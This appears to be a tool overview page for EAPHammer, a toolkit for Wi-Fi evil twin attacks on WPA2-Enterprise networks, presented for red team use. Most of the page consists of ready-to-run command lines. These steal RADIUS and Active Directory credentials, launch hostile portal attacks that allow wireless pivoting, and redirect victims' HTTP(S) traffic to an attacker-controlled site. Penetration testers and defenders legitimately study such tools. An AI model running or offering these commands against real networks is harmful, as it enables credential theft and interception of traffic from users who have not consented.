EAPHammer is a toolkit for performing targeted Wi-Fi evil twin attacks against WPA2-Enterprise networks.
It is designed to be used in full scope wireless assessments and red team engagements. As such, the focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration.
To illustrate how fast this tool is, here’s an example of how to setup and execute a credential-stealing evil twin attack against a WPA2-TTLS network in just two commands:
# generate certificates
./eaphammer –cert-wizard #
./eaphammer -i wlan0 –channel 4 –auth ttls –wpa 2 –essid CorpWifi –creds
On Kali Linux
git clone https://github.com/s0lst1c3/eaphammer.git python setup.py
- Wi-Fi Evil Twin Attacks to Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
- Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
- Wi-Fi Evil Twin Attacks to Perform captive portal attacks
- Built-in Responder integration
- Support for Open networks and WPA-EAP/WPA2-EAP
- No manual configuration necessary for most attacks.
- No manual configuration necessary for installation and setup process
How to usage
x.509 Certificate Generation
Eaphammer provides an easy-to-use wizard for generating x.509 certificates. To launch eaphammer’s certificate wizard, just use the command shown below.
Wi-Fi Evil Twin Attacks to Stealing RADIUS Credentials From EAP Networks
To steal RADIUS credentials by executing an evil twin attack against an EAP network, use the –creds flag as shown below.
#./eaphammer –bssid 1C:7E:E5:97:79:B1 –essid Example –channel 2 –interface wlan0 –auth ttls –creds
The flags shown above are self-explanatory. For more granular control over the attack, you can use the –wpa flag to specify WPA vs WPA2 and the –auth flag to specify the EAP type. Note that for cred reaping attacks, you should always specify an auth type manually since the –auth flag defaults to “open” when omitted.
#./eaphammer –bssid 00:11:22:33:44:00 –essid h4x0r –channel 4 –wpa 2 –auth ttls –interface wlan0 –creds
The –hostile-portal flag can be used to execute a hostile portal attack, as shown in the examples below.
#./eaphammer –interface wlan0 –bssid 1C:7E:E5:97:79:B1 –essid EvilC0rp –channel 6 –auth peap –wpa 2 –hostile-portal
#./eaphammer –interface wlan0 –essid TotallyLegit –channel 1 –auth open –hostile-portal
Performing Captive Portal Attacks
To perform a captive portal attack using eaphammer, use the –captive-portal flag as shown below.
#./eaphammer –bssid 1C:7E:E5:97:79:B1 –essid HappyMealz –channel 6 –interface wlan0 –captive-portal
This will cause eaphammer to execute an evil twin attack in which the HTTP(S) traffic of all affected wireless clients are redirected to a website you control.
Eaphammer will leverage Apache2 to serve web content out of /var/www/html if used with the default Apache2 configuration. Future iterations of eaphammer will provide an integrated HTTP server and website cloner for attacks against captive portal login pages.